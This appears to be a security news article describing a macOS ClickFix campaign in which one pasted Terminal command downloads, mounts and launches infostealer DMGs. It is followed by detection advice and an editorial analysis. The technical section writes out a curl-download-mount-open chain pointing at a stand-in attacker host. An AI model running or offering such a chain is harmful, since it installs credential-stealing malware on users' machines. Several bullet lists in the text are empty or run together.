# New macOS ClickFix Campaign Exploits Terminal Automation to Silently Deploy Infostealer Malware
A newly identified macOS ClickFix variant is leveraging Terminal commands to automatically download, mount, and execute information-stealing malware from malicious disk image (DMG) files, circumventing user interaction requirements and intensifying the threat posed by this already-persistent attack family.
Researchers tracking the campaign report that attackers are embedding shell commands within phishing communications and fraudulent browser notifications that trigger macOS's built-in scripting capabilities. Once executed, these commands silently perform the entire infection chain—including downloading unsigned DMG files, mounting them to the filesystem, and launching payloads—without requiring users to manually open files or grant permissions through traditional macOS security dialogs.
## The Threat
The ClickFix family, which emerged in 2023 as a social engineering framework, has long relied on social manipulation to trick users into running malicious commands. This new variant significantly reduces the friction required for successful infection by automating previously manual steps.
Key characteristics of the attack:
hdiutil mount or equivalent operations without user visibilityThe campaign primarily distributes variants of well-known infostealers including Atomic Stealer, Vidar, and Raccoon Stealer—all capable of exfiltrating sensitive data to attacker-controlled servers within minutes of execution.
## Background and Context
ClickFix represents a shift in macOS-targeted malware tactics. Rather than requiring sophisticated exploits or zero-days, the family relies on social engineering combined with legitimate system tools—making it difficult to detect and block through traditional endpoint security measures.
The original ClickFix methodology involved:
1. Displaying fake Chrome/Safari browser notifications claiming browser updates were required
2. Directing users to malicious websites offering "update" executables
3. Requiring users to manually open Downloads folders, find files, and execute them
Why the new variant is more dangerous:
| Aspect | Previous ClickFix | New Campaign |
|--------|------------------|--------------|
| User interaction required | Multiple steps | Single command execution |
| Detection difficulty | Lower (visible file operations) | Higher (automated background processes) |
| Time to infection | Several minutes | Seconds |
| Security dialog triggers | Multiple | None to one |
| Requires file system navigation | Yes | No |
The automation of the infection chain addresses the primary weakness of earlier ClickFix campaigns: users noticing suspicious file operations or becoming suspicious during multi-step manual processes.
## Technical Details
How the attack works:
The infection chain begins with compromised third-party advertising networks, fraudulent browser notifications, or phishing emails containing a single command—often disguised as an innocuous system utility or update:
curl -o /tmp/update.dmg http://attacker-domain.com/payload.dmg && hdiutil mount /tmp/update.dmg && open /Volumes/UpdateApp/installer.appThis command accomplishes the following without requiring separate user actions:
curl retrieves the disk image from attacker infrastructurehdiutil mount attaches the DMG to the filesystem at /Volumes/open launches the application, bypassing typical double-click security warningsWhy DMGs are effective:
Disk image files (DMGs) are the standard distribution format for macOS applications, making them trusted by users and less scrutinized by security software. When mounted, they appear as legitimate volumes in Finder, and applications within them can execute with the same privileges as the parent shell process.
Evasion techniques observed:
## Implications for Organizations and Users
At-risk populations:
Potential impact:
A successful infostealer infection can result in:
Detection challenges:
Traditional antivirus software struggles to detect these attacks because:
curl, hdiutil, open)## Recommendations
For individual users:
For IT and security teams:
| Control | Implementation |
|---------|-----------------|
| Block shell commands in email | Configure email gateway rules to detect and quarantine messages containing curl, hdiutil, or base64-encoded commands |
| Monitor process execution | Deploy EDR solutions that alert on Terminal launching remote code or mounting unsigned DMGs |
| Restrict Gatekeeper policies | Set macOS to "App Store and identified developers only" via System Preferences |
| Audit third-party access | Review browser extensions and revoke tokens for unused integrations |
| Network segmentation | Isolate development infrastructure from general-purpose workstations |
For security researchers:
## HackWire Analysis
This variant represents a maturation of the ClickFix ecosystem—attackers have recognized that social engineering is most effective when it requires minimal user effort. By automating the infection chain, defenders lose critical checkpoints where user suspicion might trigger. A click on a fake notification is often reflexive; copying and pasting a command requires reading, which creates friction. Removing that friction is strategically significant.
What's particularly concerning is the invisibility. Earlier malware required users to navigate Finder, locate files, and execute them—visible actions that could be interrupted by security training or system hardening. This variant performs the entire attack in the background after the initial prompt. For users without EDR solutions, there may be zero indication that their system has been compromised until attackers begin exfiltrating sensitive data or moving laterally through networks.
The focus on infostealers rather than ransomware or wormable exploits reflects current threat economics: stolen credentials and cryptocurrency keys are immediately monetizable with low risk to the attacker. A developer's SSH key is worth more than an individual's encrypted laptop because it opens access to entire organizations.
Organizations should treat this as a credential exposure event. If any macOS-using employees have clicked suspicious notifications or opened untrusted DMGs in the past 12 months, assume compromise. Audit SSH keys, rotate API tokens, review recent login activity, and monitor blockchain addresses for activity. The investment in detection is outweighed by the cost of discovering lateral movement after the fact.
— HackWire Editorial
## Related Coverage